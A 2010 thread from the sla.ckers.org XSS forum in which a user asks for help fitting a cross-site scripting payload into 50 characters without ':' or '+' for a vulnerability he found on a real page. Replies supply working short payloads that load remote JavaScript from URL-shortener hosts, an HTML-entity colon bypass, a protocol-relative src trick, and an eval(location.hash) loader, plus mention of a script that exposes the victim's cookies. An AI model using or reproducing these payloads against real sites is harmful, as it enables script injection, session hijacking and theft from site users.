Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
[help]xss with 50chars without using : or +
Posted by: Neo139
Date: May 18, 2010 09:34PM

I have found a vunlnerability but I only have 50 chars to use, and the biggest problem is I cant use ":" char nor "+"
The good info is that I can use jQuery 1.2.6 because its previously loaded on that page.

I have 52 chars with:
<script>$.getScript('http://bit.ly/9884kP')</script>
but it have ":"
and 64 chars with:
<script>$.getScript(unescape("http%3A//bit.ly/9884kP"))</script>

I tried replacing http:// with // but it didn't work using FF3. I downloaded FF2 and it didin't work also.

I think I could avoid putting the </script> and writing manually with document.write in the js. The problem is the http:
Also fiding a shorter unescape good be nice but I have searched and can't found anything.
any ideas?

Options: ReplyQuote
Re: [help]xss with 50chars without using : or +
Date: May 19, 2010 04:32AM

<script src='http&#58;//bit.ly/9884kP'></script>

48 chars

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: [help]xss with 50chars without using : or +
Posted by: Anonymous User
Date: May 19, 2010 05:29AM

<script src=http&#58//u.nu/94m7a></script>

42 - why use bit.ly if there's u.nu ;)

Regarding unescape: 'http\72//' might help



Edited 2 time(s). Last edit at 05/19/2010 05:38AM by .mario.

Options: ReplyQuote
Re: [help]xss with 50chars without using : or +
Posted by: LeverOne
Date: May 19, 2010 08:50AM

Trick with "//" called "same protocol". Therefore, it should not work from "file:". It works in all browsers including FF:

<script src=//u.nu/94m7a>

----------------------
~Veritas~



Edited 1 time(s). Last edit at 05/19/2010 08:58AM by LeverOne.

Options: ReplyQuote
Re: [help]xss with 50chars without using : or +
Posted by: thornmaker
Date: May 21, 2010 05:52PM

<script>eval(location.hash.slice(1))</script>
and append
#alert('real payload goes after the hash symbol')
to the URL. why use third-party site when you can have all-in-one :)

[edit:] you can use just
http://0x.lv
for a third party script which will alert your cookies or, if you have a hash, it will execute whatever follows the hash in your URL



Edited 2 time(s). Last edit at 05/21/2010 06:01PM by thornmaker.

Options: ReplyQuote


Sorry, only registered users may post in this forum.